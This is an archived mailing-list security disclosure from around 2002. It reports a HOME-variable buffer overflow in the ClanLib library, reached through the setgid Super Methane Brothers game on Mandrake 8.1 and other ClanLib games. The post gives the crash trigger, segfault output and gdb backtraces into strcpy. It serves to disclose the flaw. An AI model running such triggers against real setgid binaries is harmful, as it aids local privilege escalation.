Charles stayed up all night and found a hole in Eterm so I felt obligated to stay up all night and find something else wrong on my box too. In doing so I found an overflow in a game included with Mandrake 8.1 called Super Methane Brothers. $HOME=<bof here> then run /usr/games/methane. Inturn that caused me to find an overflow in ClanLib. So thanks for staying up late last night core! This was all tested against some rpms made from the mandrake src with "rpm --rebuild" libclanlib0-0.4.4-28mdk libclanlib0-magick-0.4.4-28mdk clanlib-0.4.4-28mdk libclanlib0-gl-0.4.4-28mdk libclanlib0-png-0.4.4-28mdk libclanlib0-devel-0.4.4-28mdk libclanlib1-0.5.1-4mdk libclanlib0-mikmod-0.4.4-28mdk It looks like the buffer overflow in /usr/games/methane is a library Overflow in clanlib instead. I checked some other clanlib based games to proove this. [root@linuxppc root]# export HOME=`perl -e 'print "A" x 9000'` [root@linuxppc root]# /usr/games/methane Super Methane Brothers Licensed using the GNU General Public License Version 2 http://www.methane.fsnet.co.uk ... This game requires ClanLib (v0.5.0) and Hermes (v1.3.3) http://clanlib.org/hermes (High Scores written to /var/lib/games/methanescores) Segmentation fault [root@linuxppc root]# ls -al /usr/games/methane -rwxr-sr-x 1 root games 1978056 Nov 13 06:36 /usr/games/methane* This was default on my intel Mandrake 8.1 box. I overwrote edx and ecx with my own data. I don't do intel so I didn't try any further. I got the packages for ppc and it was no fun to play with so I decided to look at some other clanlib based games to at least verify the library issue. I think the below link has info on the function causing the problem. http://dark.x.dtu.dk/~sphair/cvs/Libs/ClanLib-0.5/Documentation/Reference/html/CL_SetupDisplay.html#2325 Here are some more examples of the clanlib overflow. StarWar-0.0.1d.tar.gz [root@linuxppc StarWar-0.0.1]# export HOME=`perl -e 'print "A" x 9000'` [root@linuxppc StarWar-0.0.1]# src/starwar Segmentation fault (core dumped) This is the same place methane cored on my intel box... #0 0x0fc81b78 in strcpy () from /lib/libc.so.6 (gdb) bt #0 0x0fc81b78 in strcpy () from /lib/libc.so.6 #1 0x0ff89554 in FileConfig::LocalConfigFile () from /usr/lib/libclanCore.so.0 #2 0x0ff87014 in FileConfig::FileConfig () from /usr/lib/libclanCore.so.0 #3 0x0ff83b28 in CL_SetupCore::init_display () from /usr/lib/libclanCore.so.0 #4 0x1000d37c in InitDisplayApp::main () #5 0x0ff85270 in main () from /usr/lib/libclanCore.so.0 #6 0x0fc1eb90 in __libc_start_main () from /lib/libc.so.6 kwirk-0.0.16.tar.gz [root@linuxppc Kwirk]# ./kwirk Segmentation fault (core dumped) (gdb) #0 0x0fd36b78 in strcpy () from /lib/libc.so.6 #1 0x0fef0554 in FileConfig::LocalConfigFile () from /usr/lib/libclanCore.so.0 #2 0x0feee014 in FileConfig::FileConfig () from /usr/lib/libclanCore.so.0 #3 0x0feeab28 in CL_SetupCore::init_display () from /usr/lib/libclanCore.so.0 #4 0x1001e8f4 in TKwirk::init_modules (this=0x10054104) at kwirk.cpp:24 #5 0x0feec1fc in main () from /usr/lib/libclanCore.so.0 #6 0x0fcd3b90 in __libc_start_main () from /lib/libc.so.6 clankanoid-0.1.tgz [root@linuxppc clanka]# ./clankanoid Segmentation fault (core dumped) I think you get the idea. I would Imagine about any game on http://www.clanlib.org/links.html would have this issue also. Im sure a few clanlib games are suid like the one that came with Mandrake 8.1 (methane) -KF
This archive was generated by hypermail 2b30 : Tue Jan 15 2002 - 15:16:16 PST